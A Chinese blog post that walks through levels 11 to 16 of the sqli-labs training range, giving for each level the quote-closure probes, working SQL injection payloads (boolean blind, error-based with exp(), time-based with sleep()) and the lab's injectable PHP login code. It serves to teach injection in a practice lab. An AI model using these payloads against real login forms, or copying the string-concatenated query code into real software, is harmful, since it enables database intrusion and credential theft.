sqllibs-Less11-16

最新推荐文章于 2023-12-05 18:39:19 发布
最新推荐文章于 2023-12-05 18:39:19 发布
阅读量392 收藏 1
点赞数
分类专栏: # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107302319
版权

文章目录

11.Less-11-Error Based

11.1、报错尝试

如下图,以下试错语句。

admin’ 【单引号,报错】
admin’ %23 【单引号+注释,正常】

如下图,在username中输入 admin' #,密码随便输入,如下图,页面正常显示。
在这里插入图片描述

这一关类似于第一关,只是将get型改为了post型。
在这里插入图片描述

11.2、代码分析

	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}

12.Less12-Error-based-Double quotes

12.1、报错测试

输入 admin " 【双引号,产生如下报错,即可能含有括号】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“admin”") and password=("") LIMIT 0,1’ at line 1
admin" # 【双引号+注释,报错】
admin") # 【双引号+括号,正常】

通过上面可以发现,此关的闭合方式为“双引号+括号”闭合,其余的注入方式和上一关一样均类似于第一关的注入方式,只是将第一关的单引号变为了双引号。

PS:在这里的注释符号直接写#,不需要写%23,因为网页不会自动解析。

12.2、代码分析

	// connectivity
	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

13.Less13-Double Injection-String-with twist

13.1、报错测试

admin’ 【单引号,产生如下报错】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’’) and password=(’’) LIMIT 0,1’ at line 1
admin’) # 【单引号+括号+注释,正常显示】

通过上面可以判断这一关的闭合方式为“单引号+括号”,并且可以发现,这里会显示你是否成功以及输入的语句是否合法,但是并不会显示数据库中的账号信息之类的,类似于盲注了。
在这里插入图片描述
可以尝试着用一下布尔型盲注,请参考第五关。由于这里能够回显数据库的报错提示,可以利用报错注入进行信息查找。

猜测数据库第一位:

admin') and left(database(),1)>'a' #

如下,显示成功登陆。之后的payload参见第五关。
在这里插入图片描述

13.2、代码分析

	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

14.Less14-Double Injection-Double quotes

14.1、报错尝试

输入以下语句

admin’ 【单引号,非正常】
admin’ # 【单引号+注释,非正常】
admin" 【双引号,报错,显示如下】
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“admin”" and password="" LIMIT 0,1’ at line 1

amdin"# 【双引号+注释,成功显示,成功显示界面如下:】

在这里插入图片描述

尝试盲注获取数据库信息。
获取数据库的第一个字母信息。在username中输入:

admin" and left(database(),1)>'a' #

由于回显数据库的错误信息,因此利用报错注入。如下,在username框中输入如下语句。

admin" union select 1,exp(~(select*from(select user())x))

页面显示如下:
在这里插入图片描述

14.2、代码分析

	// connectivity
	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg" />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"  />';	
		echo "</font>";  
	}

15.Less15-Blind-Boolean Based

15.1、报错尝试

输入以下语句,不断进行试错:

admin’ 【单引号,无显示】
admin’# 【单引号+注释,正常显示】
admin" 【双引号,无显示】
admin"# 【双引号+注释,无显示】

从上面可以大致判断本关的闭合方式为单引号闭合,并且是盲注,不回显数据库的报错信息,因此我们需要进行延时注入。

猜测数据库的第一位:
当页面显示语句正确的时候,页面将会正常显示,当语句不正确的时候,将会执行sleep(5)语句,即页面将会加载5秒。

admin' and if(ascii(substr(database(),1,1))=115,1,sleep(5))#

在这里插入图片描述

15.2、代码分析

	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		echo "<br>";
		//echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		//print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

16.Less16-Blind-Time Based-Double quotes

16.1、报错尝试

在页面输入以下语句:

admin’ 【单引号,无显示】
admin" 【双引号,无显示】
admin’ # 【单引号+注释,无显示】
admin " # 【双引号+注释,无显示】
admin ’ ) # 【单引号+括号+注释,无显示】
admin " ) # 【双引号+括号+注释,正常显示】

从上面,我们可以猜测该页面闭合方式为“双引号+括号”闭合,不回显数据库错误信息,因此属于盲注,需要用到延时注入,处理方法类似于Less15.

猜测数据库第一个字符的paylaod,其余的请读者自行构造。

admin") and if(ascii(substr(database(),1,1))=115,1,sleep(5))#

在这里插入图片描述

16.2、代码分析

	// connectivity
	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		echo "<br>";
		//echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		echo "</br>";
		echo "</br>";
		//echo "Try again looser";
		//print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"  />';	
		echo "</font>";  
	}
xor0ne_10_01
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rollup-plugin-less:更少的汇总插件
04-29
npm install rollup - plugin - less -- save 用法 import './test.less' ; //generate css will be auto insert to the head tag if you set insert be true import { rollup } from 'rollup' ; import less from ...
sql_libs第一关
Xor0ne
02-17 1042
第一关通关笔记:2019/6/16 低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671 http://www.storysec.com/dvwa-sql-injection.html dvwa的闯关:https://www.freebuf.com/articles/web/120747.html BP:https://blog.csdn.ne...
SQL-libs漏洞思路总结
转瞬都有的博客
08-31 297
本文介绍了SQL注入里面常用到的十大注入方式,这里介绍的更多的是方法和技巧。如果需要更加详细的有关SQL漏洞的介绍,请关注我,在我的SQL闯关栏里就有我对于SQL闯关内容的详解。最后希望读者能谅解本文是以大段的的文字进行叙述的,而没有参加更多的图片。其实我还是想更好的通过叙述的方式来让我的读者领略SQL-libs中的技巧和方法。最后希望能给看我作品的人得以启发和思考。
sqli-libs系列
qq_43511094的博客
12-31 1485
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2389
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3721
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
postcss-less:用于解析LESS的PostCSS语法
05-13
poscss-less不是LESS编译器。 要编译LESS,请使用LESS的官方工具集。 安装 使用npm: npm install postcss-less --save-dev 如果您发现此模块有用,请考虑。 用法 无postcss-less的最常见用法是将PostCSS转换直接...
gulp-less-changed:仅当.less文件或其依赖项已更改时,才通过gulp流传递
02-03
gulp-less-changed 一个插件,仅当它们或它们的依赖性已更改时才通过LESS文件 分析LESS文件及其相关性,即使用data-uri导入和包含的文件,以节省浪费的时间来重新生成输出。 安装 $ npm install gulp-less-changed ...
SQL-labs/less1通关教程
最新发布
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
mrcrowl.easy-less-1.7.2.zip
03-25
编译后easy-less插件
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)
热门推荐
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
sql-libs 手工注入步骤
m0_59035933的博客
08-13 1515
一.首先输入',发现有报错,很高兴的事情,说明有漏洞。 1.程序没有过滤特殊字符',提交的内容接过了sql引擎解析 2.回显的内容看到了MYSQL字样 二.输入:1’ or ‘1’=‘1 出现了大量信息,但是因为这一关的代码只能输出一组数据,所以看到的也只有一组数据 三.我们希望得到数据库的其他关键数据,所以要用到union联合查询。而联合查询的关键是需要知道主查询列数,因为联合查询需要和主查询的列数相同,不然会出现报错。所以我们使用ord...
SQLLIBS靶场进阶(2)
ppbgi的博客
04-14 654
1—22关链接 二十三 将#、–+进行了处理 其他同上! 二十四 先进行账号的注册: 登录: 修改密码:初始密码123456 ,修改为234567 用修改的密码登录admin2: 二十五 或者 在尝试的时候,发现&&会报错,但是理论上来讲应该可以,所以用了|| 其他同上! ...
sql-libs靶场-----0x00、环境准备
七天
08-14 596
【代码】sql-libs靶场-----0x00、环境准备。
sqli-labs (less-11)
kukudeshuo的博客
03-09 2603
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sql-lib 闯关课程第一课
tmgt的博客
04-25 2995
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
sqli_libs通关教程
qq_48904485的博客
03-22 5165
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
Sqlilabs11-22关卡详解(Post式)
爱吃仡坨的Blog
10-18 897
我们随便输入一个内容,只有一个登陆失败的图片并没有带有sql语法的报错回显通过构造一个错误的语法ggbond'单引号;发现有sql语句的错误回显;我们可以判断出此登陆界面是通过单引号闭合的构造一个恒成立的sql语句,发现爆出其登陆的用户名和密码通过orderby函数判断出有两个字段通过union查询 爆出其字段所在位置,如图所示。
miniprogram-ts-less-quickstart
09-16
miniprogram-ts-less-quickstart是一个用于快速启动小程序开发的项目模板。它结合了TypeScript和Less两种前端技术,能够提供更好的开发体验和代码质量。 首先,TypeScript是JavaScript的超集,它增加了强类型、接口、泛型等特性,让编码更加健壮和可靠。使用TypeScript可以在开发过程中发现潜在的错误,提高开发效率。此外,TypeScript还支持ES6+的语法,并且提供了丰富的类型定义和IDE的支持,让我们能够更好地开展小程序开发工作。 另外,miniprogram-ts-less-quickstart还使用了Less作为CSS预处理器。Less可以增加CSS的可复用性和可维护性,提供了变量、嵌套规则、混入等特性,使得我们能够更加方便地编写和管理样式。通过使用Less,我们能够更好地组织样式代码,减少重复的工作,并且能够更容易地进行主题切换和样式调整。 miniprogram-ts-less-quickstart提供了一个基础的项目结构和一些常用的配置,使得我们能够快速上手开发。它包含了一些常用的开发工具和库,如webpack、eslint等,能够帮助我们提高开发效率和代码质量。此外,它还提供了一些示例代码和文档,让我们能够更好地理解和使用这个项目模板。 综上所述,miniprogram-ts-less-quickstart是一个非常有价值的项目模板,能够帮助我们快速启动小程序开发,并且提供了更好的开发体验和代码质量保障。它结合了TypeScript和Less两种前端技术,让我们能够更好地开展小程序开发工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值